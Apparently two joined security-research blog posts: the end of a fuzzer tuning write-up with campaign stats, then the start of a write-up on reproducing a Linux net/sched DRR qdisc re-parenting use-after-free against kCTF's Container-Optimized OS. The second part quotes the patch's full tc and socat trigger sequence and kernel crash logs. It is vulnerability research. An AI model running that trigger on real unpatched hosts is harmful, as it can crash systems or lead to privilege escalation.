In another effort to avoid corpus bloat, I moved from a model where every fuzzer gets every other fuzzer’s entire corpus every sync-interval (tunable at runtime via command line), to a model where every fuzzer would instead randomly sample inputs from other fuzzers for the entirety of the sync-interval before it would put them all back on disk and randomly pick more to sample. For my longest campaign I set this sync interval to 1 hour.

Corpus Biasing

Lastly, I decided to play with how the corpus would provide inputs to the mutator. I implemented a couple of methods: get_input_uniform and get_input_bias_new. The former would just randomly select an input from the corpus with uniform distribution (including the sampled inputs) and the latter would bias the newer inputs in the corpus by a tunable rate. For my longest campaign I set it so that around 67% of the time, we’d pick a new input. Sampled inputs from other fuzzers were considered “new” as well in this due to the way I implemented the sampling. I have to say, I don’t think this made a bit of difference in our progress. I think on a long enough time horizon it probably doesn’t matter much.
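As a sketch of what a biased pick could look like: the post does not show how Lucid defines “new”, so treating a fixed-size tail of the corpus as the new inputs is purely my assumption, as is the signature below.

```python
import random


def get_input_bias_new(corpus, new_count: int, bias: float, rng: random.Random):
    """Pick from the newest `new_count` inputs with probability `bias`,
    otherwise pick uniformly from the whole corpus.

    `corpus` is ordered oldest to newest.
    """
    if new_count > 0 and rng.random() < bias:
        return rng.choice(corpus[-new_count:])
    return rng.choice(corpus)


rng = random.Random(0)
corpus = list(range(1000))    # stand-in inputs; 990 and up count as "new"
picks = [get_input_bias_new(corpus, 10, 0.67, rng) for _ in range(10_000)]
new_fraction = sum(p >= 990 for p in picks) / len(picks)
```

Here the newest 1% of the corpus ends up receiving roughly two thirds of the picks, compared with about 1% under uniform selection.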

We ended up setting a substantial edge-finding record in just 15h of wall-clock time and under 2 million iterations.

[lucid stats (start time: 2025-09-25 21:22:08)]
globals: uptime: 0d 15h 47m 18s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 1.923M | iters/s: 27.05 | iters/s/f: 3.38
cpu: target: 97.7% | reset: 2.2% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 25866 | last find: 0h 4m 5s | map: 39.47%
snapshot: dirty pages: 9536 | dirty / total: 0.00169% | reset memcpys: 1475
corpus: inputs: 15689 | corpus size (MB): 44.976 | max input: 0x10088

So with all of the improvements over time we were able to go from 17k edges in 90 million iterations to 26k edges in 2 million iterations. I think the biggest positive change was probably just using seeds. I don’t think much of the core fuzzer tweaking (reducing corpus bloat, sampling inputs, avoiding hitcount inputs) made too much of a difference.

Conclusions

In General

New snapshot method worked well and continued to be performant deep into campaign with thousands of dirty pages to reset
Bochs emulation is the main bottleneck in the fuzzer, you probably need quite a bit of hardware to reach coverage saturation for complex targets
Redqueen provided some huge boosts in edge discovery, but it needs a longer campaign to be beneficial
Corpus bloat reduction didn’t massively affect the fuzzer, at least on our 4 day campaign, it seems benign enough to keep
Biasing towards newer inputs didn’t seem to help the fuzzer find edges more efficiently
Re-architecting mutators to be plug and play was a huge improvement, now creating a fuzzer is as easy as implementing a custom Mutator
High-quality seeds are the easiest way to massively boost efficiency

Per Stage

Stage 1: High iteration count (88M) but only 16,917 edges - inefficient due to malformed, easily rejected inputs
Stage 2: Dramatic efficiency gain - 17,740 edges in only 2.8M iterations (~35x more efficient)
Stage 3: Broken Redqueen severely hurt performance - only 370K iterations in 14 hours
Stage 4: Fixed Redqueen restored throughput, rare but massive edge discovery gains
Stage 5: Seeds + optimizations achieved best results - 25,866 edges in 1.9M iterations

Caveats

Fuzzing is extremely random, none of these results should be taken at face value besides massive 2-10x improvements
Fuzzing is highly target dependent. Biasing towards new inputs, our corpus sampling interval, ignoring hit-counts, and reducing corpus bloat didn’t seem to have a massive negative effect with this specific target, but may be massively beneficial or harmful against others
Ideally I would’ve created line graphs documenting coverage for each stage, but I didn’t have the presence of mind to do that, I apologize

What’s Next?

Now with the first fuzzing journey out of the way and some of the core features improved/fixed, we can move onto more earnest bug hunting. Next blog series we will pick a single target (instead of 4 like in this episode) and iterate on a purpose-built mutator again hoping to find bugs. We will do all of the things you do when you’re fuzzing for bugs: create good seeds, visualize coverage, find roadblocks, iterate on mutator, scale the fuzzing workload to many cores, etc.

Repo-wise, I hope to clean up my local version this weekend and then find a way to standardize the build process of the entire thing. Maybe we’ll Dockerize it, I’m not sure yet.

Patch-Gapping the Google Container-Optimized OS for $0

2025-02-13T00:00:00+00:00

Background

I’m trying to really focus this year on developing technically in a few ways. Part of that is reviewing kCTF entries. This helps me get a sense of what subsystems are producing the most bugs at the moment in the program and also keeps me up to date on buggy patterns to look for. Also I get to shamelessly steal players’ exploitation techniques as well. A lot of recent bugs have come from /net/sched so I was looking at patches for the subsystem and found a patch that claimed an exploitable UAF was possible. That patch is here. I didn’t realize at the time, but “Lion Ackermann” mentioned in the patch as the bug discoverer (and presumably exploiter) is a kCTF player.

I checked and discovered that at the time I found the patch the COS 105 instance in kCTF was still vulnerable to this bug. I stopped looking then, but lesson learned, the LTS instance was also still vulnerable. I don’t know exactly how the rules work, but this bug was exploited as a 0day entry as per the public kCTF responses spreadsheet in December, but at the time I started working on it, there were no patch links in the spreadsheet for this bug and the instances remained unpatched.

At this point I started trying to figure out the bug and possibly exploit it. My goal was to patch-gap the COS 105 instance with a 1day entry. Shortly after I began investigating the bug, a new release was announced, but luckily the new instances would be vulnerable as well as they had also not been patched. Since the COS 105 slot was unexploited, and the upcoming COS 105 instance would also be vulnerable, I mistakenly took this as a signal to not rush as the instance would probably remain unexploited while I worked on the project slowly. In hindsight, I should’ve worked harder on this as the COS 105 instance was exploited a few hours before I finished. It may be moot anyways since the bug was exploited previously in the program as a 0day, still not sure about that. Anyways, I encountered some self-inflicted roadblocks that really hindered my progress, we’ll get into those. Next time I’ll work harder and dedicate more time to the effort instead of just a few hours here and there at night.

Patch Analysis

The patch text is very descriptive and provides a nice proof-of-concept to reproduce the buggy condition:

net: sched: Disallow replacing of child qdisc from one parent to another
Lion Ackermann was able to create a UAF which can be abused for privilege
escalation with the following script

Step 1. create root qdisc
tc qdisc add dev lo root handle 1:0 drr

step2. a class for packet aggregation do demonstrate uaf
tc class add dev lo classid 1:1 drr

step3. a class for nesting
tc class add dev lo classid 1:2 drr

step4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

step5.
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

step6.
tc qdisc add dev lo parent 1:2 handle 3:0 drr

step7.
tc class add dev lo classid 3:1 drr

step 8.
tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

step 9. Display the class/qdisc layout

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 limit 1000p
 qdisc drr 3: dev lo parent 1:2

step10. trigger the bug <=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:0

step 11. Redisplay again the qdiscs/classes

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 1:3 root leaf 4: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
 qdisc drr 3: dev lo parent 1:2

Observe that a) parent for 4:0 does not change despite the replace request.
There can only be one parent.  b) refcount has gone up by two for 4:0 and
c) both class 1:3 and 3:1 are pointing to it.

Step 12.  send one packet to plug
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
step13.  send one packet to the grafted fifo
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

step14. lets trigger the uaf
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not
a delete from one node(3:1) and add to another node (1:3) as in step10.
While we could "fix" with a more complex approach there could be
consequences to expectations so the patch takes the preventive approach of
"disallow such config".

The bug here is that a qdisc can be “re-parented” to a class that is not its original parent. This kind of logic was not intended. When you create these types of classes that can have qdiscs attached, a default qdisc is allocated and you can graft a new qdisc to the class afterwards to replace the current qdisc. So you can see that class 3:1 is first created in step 7 and then we graft a qdisc onto it in step 8. This will free the default qdisc and instantiate this one in its place and attach it to the class.

The bug however, lets you graft that qdisc (handle 4:0) onto a different class by using the same grafting mechanism that we used on 3:1 but now we’re grafting the same qdisc onto two classes. The patch points out the side effects of this bug are basically this:

From qdisc 4:0’s point of view, its parent is still class 3:1, that is never changed
From class 3:1’s perspective, qdisc 4:0 is still its child qdisc
From class 1:3’s perspective, qdisc 4:0 is now its child qdisc
The refcount on the qdisc is now 2: 1 from the initial graft onto 3:1 and another 1 from the re-parent graft onto 1:3

So those are the side effects the bug produces. At this point, I didn’t know a single thing about /net/sched, classes, qdiscs, etc, so the learning curve during this process was steep. I had never dealt with this subsystem before in my life. But after a lot of Googling and ChatGPTing, I was able to reproduce the PoC in the patch with the tc utility just as the patch specifies. I went through all the steps and when I got to step 14 and it was time to trigger the UAF, I got the following splat after deleting class 1:3:

[   10.519000] ------------[ cut here ]------------
[   10.521778] list_del corruption, ffff8fdd50a008d0->next is NULL
[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #1
[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
[   10.600704]  <TASK>
[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
[   10.699977]  </TASK>
[   10.701360] ---[ end trace 8e001f66f1703586 ]---

At this point I was excited because I thought I had recreated the bug and caused a UAF and I’d soon be looking for ways to exploit the bug; however I was extremely wrong. All this splat is is a warning that there was an invalid list_del operation. In my development environment, this was enough to cause a kernel panic. I had KASAN enabled so if there was a UAF I would’ve seen a different splat, so now I’m very confused. On further inspection, I never even reached the step where I delete class 1:1 as in the PoC, so what is going on? Why does my PoC stop here on this list_del operation? Time to dig into the details.

First, why do we even encounter a bad list_del operation? We still don’t know much about this bug or subsystem yet. I had basically just recreated the PoC in the patch and had done almost zero critical thinking of my own. After a lot of printk debugging, I finally figured out where the invalid list_del comes from.

List Bug Analysis

First of all, why is list_del complaining? Well it turns out that a common kernel configuration is CONFIG_DEBUG_LIST, which turns the list manipulation APIs, like list_del into more careful versions of themselves. list_del’s job is to remove a list_head node out of a linked list. If you can visualize a linked list in the kernel, it’s essentially a list of nodes. Each node contains a prev and a next pointer that reference the previous and the next node in the list respectively. So the debug list configuration has some sanity checks that make sure that when you go to remove a node from a list, there hasn’t been any corruption of the node itself. When we delete class 1:3, something happens during that process and we end up here:

static inline void __list_del_entry(struct list_head *entry)
{
	if (!__list_del_entry_valid(entry))
		return;

	__list_del(entry->prev, entry->next);
}

Things are going awry in the __list_del_entry_valid check it seems:

/*
 * Performs list corruption checks before __list_del_entry(). Returns false if a
 * corruption is detected, true otherwise.
 *
 * With CONFIG_LIST_HARDENED only, performs minimal list integrity checking
 * inline to catch non-faulting corruptions, and only if a corruption is
 * detected calls the reporting function __list_del_entry_valid_or_report().
 */
static __always_inline bool __list_del_entry_valid(struct list_head *entry)
{
	bool ret = true;

	if (!IS_ENABLED(CONFIG_DEBUG_LIST)) {
		struct list_head *prev = entry->prev;
		struct list_head *next = entry->next;

		/*
		 * With the hardening version, elide checking if next and prev
		 * are NULL, LIST_POISON1 or LIST_POISON2, since the immediate
		 * dereference of them below would result in a fault.
		 */
		if (likely(prev->next == entry && next->prev == entry))
			return true;
		ret = false;
	}

	ret &= __list_del_entry_valid_or_report(entry);
	return ret;
}

Which in turn calls __list_del_entry_valid_or_report because we do indeed have CONFIG_DEBUG_LIST enabled:

bool __list_del_entry_valid_or_report(struct list_head *entry)
{
	struct list_head *prev, *next;

	prev = entry->prev;
	next = entry->next;

	if (CHECK_DATA_CORRUPTION(next == NULL,
			"list_del corruption, %px->next is NULL\n", entry) ||
	    CHECK_DATA_CORRUPTION(prev == NULL,
			"list_del corruption, %px->prev is NULL\n", entry) ||
	    CHECK_DATA_CORRUPTION(next == LIST_POISON1,
			"list_del corruption, %px->next is LIST_POISON1 (%px)\n",
			entry, LIST_POISON1) ||
	    CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
			"list_del corruption, %px->prev is LIST_POISON2 (%px)\n",
			entry, LIST_POISON2) ||
	    CHECK_DATA_CORRUPTION(prev->next != entry,
			"list_del corruption. prev->next should be %px, but was %px. (prev=%px)\n",
			entry, prev->next, prev) ||
	    CHECK_DATA_CORRUPTION(next->prev != entry,
			"list_del corruption. next->prev should be %px, but was %px. (next=%px)\n",
			entry, next->prev, next))
		return false;

	return true;
}

So what’s going on? We don’t know much about the /net/sched code yet, but it appears that because we have CONFIG_DEBUG_LIST, there is a check on the node you want to remove from the list. If you had the following linked list:

A -> B -> C -> D -> A

Each node in the list would point to its neighbors. For instance, node D would have node C in its prev field and node A in its next field, because the list is circular. The validity check here makes sure that if you want to delete node D, for instance, node C says its next node is D and node A says its previous node is D. Makes sense. But in our list_del WARN() banner we see that this function returns false because list_del corruption, ffff8fdd50a008d0->next is NULL. So we can’t even check the neighboring nodes for sanity because our node D doesn’t even have a next field value, it’s NULL.
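To make the check concrete, here is a minimal userspace sketch of a circular doubly linked list with a simplified validity check. This is not the kernel's code: struct node and the node_* helpers are names I made up for illustration, and the check only covers the NULL and neighbor cases discussed above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Userspace stand-in for the kernel's struct list_head (hypothetical name). */
struct node {
	struct node *prev;
	struct node *next;
};

/* Make a node point at itself: an empty circular list. */
static void node_init(struct node *n)
{
	n->prev = n;
	n->next = n;
}

/* Insert n just before head, i.e. at the tail of the list. */
static void node_add_tail(struct node *n, struct node *head)
{
	n->prev = head->prev;
	n->next = head;
	head->prev->next = n;
	head->prev = n;
}

/*
 * Simplified version of the checks described above: NULL links are
 * rejected first, then both neighbors must point back at the entry.
 */
static bool node_del_valid(const struct node *entry)
{
	assert(entry != NULL);
	if (entry->next == NULL || entry->prev == NULL)
		return false;
	if (entry->prev->next != entry)
		return false;
	if (entry->next->prev != entry)
		return false;
	return true;
}

/* Unlink only when the checks pass; report whether the unlink happened. */
static bool node_del(struct node *entry)
{
	if (!node_del_valid(entry))
		return false;
	entry->prev->next = entry->next;
	entry->next->prev = entry->prev;
	entry->prev = NULL;
	entry->next = NULL;
	return true;
}
```

A node that was never linked (both pointers NULL) fails the very first test, which is the same shape as the "->next is NULL" message in the splat.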

Ok so we fail this list_del and the PoC just dies here because when we delete class 1:3, the list_head that we submit for deletion at some point in the /net/sched code is either corrupted or was never initialized. So let’s now figure out what is going on in /net/sched when this bug occurs to see if we can figure out what is happening.

Sched Bug Analysis

Taking a deeper dive into the /net/sched code it became clear why the node that we were deleting was in a buggy state. In the PoC we create a class 1:1 and assign it a qdisc of type plug. A plug qdisc is meant to literally stop packets from being dequeued until it’s given an explicit release command or deleted; it plugs up the qdisc with packets as they are “enqueued”. So if we send a packet to class 1:1, that packet will be enqueued in 1:1’s qdisc that is a plug type, meaning those packets will sit there until we explicitly ask for them. So at this point, it’s clear that for some reason, making sure packets are held in the plug qdisc is crucial to the PoC. But what about our buggy list_head node? It’s clear that after we send a packet to class 1:1 and the plug qdisc, we send a packet to 1:3. Class 1:3 is the class that we grafted the already existing pfifo qdisc onto from 3:1 when we exercised the re-parenting bug. Let’s take a look at what happens when we send a packet to a class, namely class 1:3:

static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
		       struct sk_buff **to_free)
{
	unsigned int len = qdisc_pkt_len(skb);
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	int err = 0;
	bool first;

	cl = drr_classify(skb, sch, &err);		// [1]
	if (cl == NULL) {
		if (err & __NET_XMIT_BYPASS)
			qdisc_qstats_drop(sch);
		__qdisc_drop(skb, to_free);
		return err;
	}

	first = !cl->qdisc->q.qlen;			// [2]
	err = qdisc_enqueue(skb, cl->qdisc, to_free);	// [3]
	if (unlikely(err != NET_XMIT_SUCCESS)) {
		if (net_xmit_drop_count(err)) {
			cl->qstats.drops++;
			qdisc_qstats_drop(sch);
		}
		return err;
	}

	if (first) {
		list_add_tail(&cl->alist, &q->active);	// [4]
		cl->deficit = cl->quantum;
	}

	sch->qstats.backlog += len;
	sch->q.qlen++;
	return err;
}

There are a few important things going on in here. I’ve not yet mentioned the drr aspect of this, which stands for “Deficit Round Robin” and is the type of algorithm used to determine how packet delivery is scheduled in this PoC. The details of the DRR algorithm are not super important, but from what I have learned at a high level it basically keeps track of what classes are currently “active”, ie, have packets enqueued to them, and tries to deliver the packets based on “deficits” that are configurable. So this way we make sure that packets are distributed in a way that makes sense to us as an end-user trying to shape traffic or guarantee some quality of service. This function is invoked when the qdisc we set up in step 1 has been enqueued with a packet (at the interface level, we use loopback):

[1]: In this step we have a packet, and we attempt to classify the packet into one of the existing drr classes that belong in the root qdisc hierarchy with the drr_classify function
[2]: If we find a class that matches for the packet, ie the priority matches a class we have setup like 1:3, we check class 1:3’s qdisc and see if it has been enqueued with any packets, if it has not, the first flag is set to true
[3]: Class 1:3’s qdisc is enqueued with a packet
[4]: If this was the class’s first packet, this packet needs to be placed on the drr scheduler’s active list which contains list_head structs for every drr class that has packets enqueued so that the scheduler can apply the algorithm and make sure packets are dequeued appropriately

Everything in here makes sense and after printing out the class and qdisc pointer values and lining them up with allocations from the PoC when we set up the hierarchy, nothing seemed amiss here. Let’s look at the backtrace from when the list_del WARN() occurs to see what function that occurred in:

[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0

So we land in drr_qlen_notify from a call to drr_delete_class:

static int drr_delete_class(struct Qdisc *sch, unsigned long arg,
			    struct netlink_ext_ack *extack)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl = (struct drr_class *)arg;

	if (cl->filter_cnt > 0)
		return -EBUSY;

	sch_tree_lock(sch);

	qdisc_purge_queue(cl->qdisc);				// [1]
	qdisc_class_hash_remove(&q->clhash, &cl->common);	// [2]

	sch_tree_unlock(sch);

	drr_destroy_class(sch, cl);
	return 0;
}

[1]: In this step we purge the class’s qdisc, which in our case would be our buggy qdisc that we re-parented to 1:3 from 3:1
[2]: Remove this class’s hash from the scheduler’s class hash table so that it cannot be looked up again

The source doesn’t quite match with the back trace, probably because of inlining, but we end up in drr_qlen_notify from qdisc_purge_queue calling qdisc_tree_reduce_backlog as part of the qdisc cleaning up process. This is where our buggy state reveals itself:

void qdisc_tree_reduce_backlog(struct Qdisc *sch, int n, int len)
{
	bool qdisc_is_offloaded = sch->flags & TCQ_F_OFFLOADED;
	const struct Qdisc_class_ops *cops;
	unsigned long cl;
	u32 parentid;
	bool notify;
	int drops;

	if (n == 0 && len == 0)
		return;
	drops = max_t(int, n, 0);
	rcu_read_lock();
	while ((parentid = sch->parent)) {				// [1]
		if (parentid == TC_H_ROOT)
			break;

		if (sch->flags & TCQ_F_NOPARENT)
			break;
		/* Notify parent qdisc only if child qdisc becomes empty.
		 *
		 * If child was empty even before update then backlog
		 * counter is screwed and we skip notification because
		 * parent class is already passive.
		 *
		 * If the original child was offloaded then it is allowed
		 * to be seem as empty, so the parent is notified anyway.
		 */
		notify = !sch->q.qlen && !WARN_ON_ONCE(!n &&
						       !qdisc_is_offloaded);
		/* TODO: perform the search on a per txq basis */
		sch = qdisc_lookup(qdisc_dev(sch), TC_H_MAJ(parentid)); 
		if (sch == NULL) {
			WARN_ON_ONCE(parentid != TC_H_ROOT);
			break;
		}
		cops = sch->ops->cl_ops;				// [2]
		if (notify && cops->qlen_notify) {
			cl = cops->find(sch, parentid);			// [3]
			cops->qlen_notify(sch, cl);			// [4]
		}
		sch->q.qlen -= n;
		sch->qstats.backlog -= len;
		__qdisc_qstats_drop(sch, drops);
	}
	rcu_read_unlock();
}

[1]: We use the parentid that is derived from the qdisc. This is where the problem is: remember that one of the effects of the bug was that the qdisc itself doesn’t know that it was reparented to 1:3, so its parentid is still going to reference class 3:1
[2]: Grab a reference to the function table for the qdisc’s class’s ops member so that we do a class appropriate search, ie drr
[3]: Use the class ops to execute the find function, drr_search_class. This sets cl to class 3:1 because according to the buggy qdisc, that is still its parent class
[4]: We call the class ops qlen_notify function, which for drr is drr_qlen_notify

static void drr_qlen_notify(struct Qdisc *csh, unsigned long arg)
{
	struct drr_class *cl = (struct drr_class *)arg;

	list_del(&cl->alist);
}

And here is the problem! We call list_del on class 3:1’s alist member which is an uninitialized list_head. Its list_head is uninitialized (NULL) because it was never placed on the drr scheduler’s active list because when we enqueued packets into class 1:3, it was class 1:3’s alist that was initialized and inserted into the scheduler’s active class list. This explains why we get the splat.
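The stale-parent lookup can be modeled in a few lines of userspace C. This is only a sketch under heavy simplification: the real code first looks up the parent qdisc by the major number and then asks that qdisc’s class ops for the class, while here a single flat table stands in for both steps. H_MAJ mirrors the kernel’s TC_H_MAJ; H_MAKE, struct model_class, struct model_qdisc, find_class and notify_target are all hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Handle layout: major number in the top 16 bits, minor in the bottom 16. */
#define H_MAJ(h)         ((h) & 0xFFFF0000u)
/* Hypothetical convenience: takes the unshifted major, unlike TC_H_MAKE. */
#define H_MAKE(maj, min) ((((uint32_t)(maj)) << 16) | ((uint32_t)(min) & 0xFFFFu))

struct model_class {
	uint32_t classid;
	int linked;		/* 1 if the class's alist is on the active list */
};

struct model_qdisc {
	uint32_t parent;	/* classid the qdisc believes it is attached to */
};

/* Flat lookup by classid, standing in for qdisc_lookup() plus cops->find(). */
static struct model_class *find_class(struct model_class *tbl, size_t n,
				      uint32_t classid)
{
	assert(tbl != NULL);
	for (size_t i = 0; i < n; i++)
		if (tbl[i].classid == classid)
			return &tbl[i];
	return NULL;
}

/* The class that gets the qlen_notify call when the child qdisc empties. */
static struct model_class *notify_target(struct model_class *tbl, size_t n,
					 const struct model_qdisc *child)
{
	return find_class(tbl, n, child->parent);
}
```

With a table holding 1:3 (linked) and 3:1 (never linked) and a qdisc whose parent field still says 3:1, notify_target returns the 3:1 entry, so the unlink is attempted on a class that was never on the active list.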

That’s one mystery solved, but why does our PoC stop at deleting class 1:3 on a list_del bug when the patch mentions a UAF and includes deleting class 1:1?

Shooting Myself in the Foot

At this point I was happy to have discovered why we were encountering the list bug, but still didn’t see how this bug was exploitable or could lead to UAF. I started to suspect that the PoC in the patch was just to prove there was in fact an issue and not directly expose a UAF exactly. This was a horrible assumption that led me very astray. For probably two days’ worth of effort, I read all of the code over and over looking for ways that I could get a UAF on the buggy qdisc object. I don’t know why I assumed that the UAF must be on the buggy qdisc, but the fact that it appeared to belong to two separate classes weighed heavily on my mind. The issue I kept coming back to was: the qdisc’s refcount is correct, it’s 2, so how could it be the UAF object? I tried to find ways that I could free the qdisc, but still retain a reference to it via class 1:3 or class 3:1 in hopes that that would be the way to access the UAF.

After a couple of days of trying lots of different strategies and thinking about it, I realized that there was no way to free the qdisc from this buggy condition. If you delete its real parent in 3:1 you have no way to grab a handle to it again, because non-root qdiscs must have a classid. So you can’t even look up the qdisc without providing a classid. If you delete 1:3, it will remove a refcount from the qdisc, but now everything is normal, it has a refcount of 1 and belongs to class 3:1.

I was very frustrated at this part and decided to start over, maybe I missed something in the patch. I fixated on the fact that in the patch they specifically say “lets trigger the UAF” and the action includes deleting 1:1. To this point, I was never able to even delete 1:1 because I get stuck panicking on the list bug. After toying with the idea of first initializing 3:1’s alist appropriately and getting it added to the active list for the scheduler to bypass the list bug, I decided to just quickly make sure there was nothing wrong with my setup. Mind you, I’ve been working in this environment for 2-3 days at this point getting familiar with the bug, reading the code, debugging, brainstorming about ways to get a UAF on the qdisc, etc.

I revisited the list code we discussed above. There were those CHECK_DATA_CORRUPTION invocations in the __list_del_entry_valid_or_report function like this:

#define CHECK_DATA_CORRUPTION(condition, addr, fmt, ...)		 \
	check_data_corruption(({					 \
		bool corruption = unlikely(condition);			 \
		if (corruption) {					 \
			if (addr)					 \
				mem_dump_obj(addr);			 \
			if (IS_ENABLED(CONFIG_BUG_ON_DATA_CORRUPTION)) { \
				pr_err(fmt, ##__VA_ARGS__);		 \
				BUG();					 \
			} else						 \
				WARN(1, fmt, ##__VA_ARGS__);		 \
		}							 \
		corruption;						 \
	}))

#endif	/* _LINUX_BUG_H */

Welp, this is a pretty important discovery. It looks like if you have CONFIG_BUG_ON_DATA_CORRUPTION enabled, you will BUG() on an invalid list del operation and if you don’t have it enabled, you will simply receive a WARN(). I checked my kernel config in my development environment and sure enough I had CONFIG_BUG_ON_DATA_CORRUPTION=y. Let’s check the kCTF kernel configuration: CONFIG_BUG_ON_DATA_CORRUPTION is not set. Yikes! The whole reason I was stuck on the list delete operation, for days, was that I had the wrong kernel configuration. I felt awful about this but going forward I’ll obviously make my environment more kCTF-like from the beginning.

Finally a UAF to Investigate

Once I had the right kernel configuration, I re-ran the PoC and behold:

[   26.091921] ==================================================================
[   26.093519] BUG: KASAN: slab-use-after-free in __list_del_entry_valid+0x7a/0x140
[   26.095252] Read of size 8 at addr ffff8880134c0558 by task tc.bin/816
[   26.096631] 
[   26.097090] CPU: 0 PID: 816 Comm: tc.bin Tainted: G        W          6.5.13 #92
[   26.098817] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[   26.100720] Call Trace:
[   26.101297]  
[   26.101771]  dump_stack_lvl+0x48/0x60
[   26.102612]  print_report+0xc2/0x600
[   26.103384]  ? __virt_addr_valid+0xc7/0x140
[   26.104294]  ? __list_del_entry_valid+0x7a/0x140
